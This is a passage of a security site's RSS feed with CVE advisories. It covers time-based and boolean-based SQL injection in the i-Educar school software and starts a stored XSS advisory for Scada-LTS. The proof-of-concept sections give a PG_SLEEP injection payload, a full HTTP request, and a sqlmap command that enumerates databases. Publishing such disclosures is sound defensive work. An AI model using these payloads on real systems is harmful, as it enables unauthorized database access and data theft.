&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39; AND 4698=(SELECT 4698 FROM PG_SLEEP(5)) AND &amp;amp;#39;xiCO&amp;amp;#39;=&amp;amp;#39;xiCO
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;example-request&amp;#34;&amp;gt;Example Request
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /intranet/agenda.php?cod_agenda=2%27%20AND%204698=(SELECT%204698%20FROM%20PG_SLEEP(5))%20AND%20%27xiCO%27=%27xiCO  HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost:8086
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua: &amp;amp;#34;Not)A;Brand&amp;amp;#34;;v=&amp;amp;#34;8&amp;amp;#34;, &amp;amp;#34;Chromium&amp;amp;#34;;v=&amp;amp;#34;138&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-mobile: ?0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-platform: &amp;amp;#34;Linux&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: pt-BR,pt;q=0.9
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=5AfYtvGRiuEgLBVbvksmwiNSnG75l4waXNMo1PEV
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;normal-request&amp;#34;&amp;gt;Normal request:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9531/image.png&amp;#34;
	width=&amp;#34;755&amp;#34;
	height=&amp;#34;463&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9531/image_hu_ad6bd9751fe854f9.png 480w, /p/cve-2025-9531/image_hu_c861952455d3f9c2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;163&amp;#34;
		data-flex-basis=&amp;#34;391px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;sqli-request&amp;#34;&amp;gt;SQLi Request:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9531/image-1.png&amp;#34;
	width=&amp;#34;749&amp;#34;
	height=&amp;#34;471&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9531/image-1_hu_d6a9f2422248cbd0.png 480w, /p/cve-2025-9531/image-1_hu_8485356e4f83ee41.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;159&amp;#34;
		data-flex-basis=&amp;#34;381px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9531.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9531.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 27 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9532</title>
        <link>https://www.cvehunters.com/p/cve-2025-9532/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9532/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9532-sql-injection-boolean-based-vulnerability-in-id-parameter-on-regraavaliacaoviewidid-endpoint&amp;#34;&amp;gt;CVE-2025-9532: SQL Injection (Boolean-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;RegraAvaliacao/view?id=[id]&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9532&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9532&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;RegraAvaliacao/view?id=[id]&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9532-sql-injection-boolean-based-vulnerability-in-id-parameter-on-regraavaliacaoviewidid-endpoint&amp;#34;&amp;gt;CVE-2025-9532: SQL Injection (Boolean-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;RegraAvaliacao/view?id=[id]&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9532&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9532&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;RegraAvaliacao/view?id=[id]&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;RegraAvaliacao/view?id=[id]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sqlmap -u &amp;amp;#34;http://localhost:8086/module/RegraAvaliacao/view?id=1&amp;amp;#34; -p id --cookie=&amp;amp;#34;i_educar_session=qEk2wbjxS5IbECJGqnIa0dbmIyI3XIsXqm3WSh6K&amp;amp;#34; \ --dbms=PostgreSQL --technique=B --dbs --batch
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9532/image.png&amp;#34;
	width=&amp;#34;643&amp;#34;
	height=&amp;#34;181&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9532/image_hu_916de85146360227.png 480w, /p/cve-2025-9532/image_hu_f7d5ec59efe01a20.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;355&amp;#34;
		data-flex-basis=&amp;#34;852px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9532/image-1.png&amp;#34;
	width=&amp;#34;435&amp;#34;
	height=&amp;#34;330&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9532/image-1_hu_a62c4634acc8c2b6.png 480w, /p/cve-2025-9532/image-1_hu_5b7f6002eccfaf96.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;131&amp;#34;
		data-flex-basis=&amp;#34;316px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9532.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9532.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 27 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9388</title>
        <link>https://www.cvehunters.com/p/cve-2025-9388/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9388/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9388-cross-site-scripting-xss-stored-endpoint-watch_listshtm-parameter-name&amp;#34;&amp;gt;CVE-2025-9388: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;watch_list.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9388&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9388&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;watch_list.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;watch_list.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9388-cross-site-scripting-xss-stored-endpoint-watch_listshtm-parameter-name&amp;#34;&amp;gt;CVE-2025-9388: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;watch_list.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9388&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9388&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;watch_list.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;watch_list.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
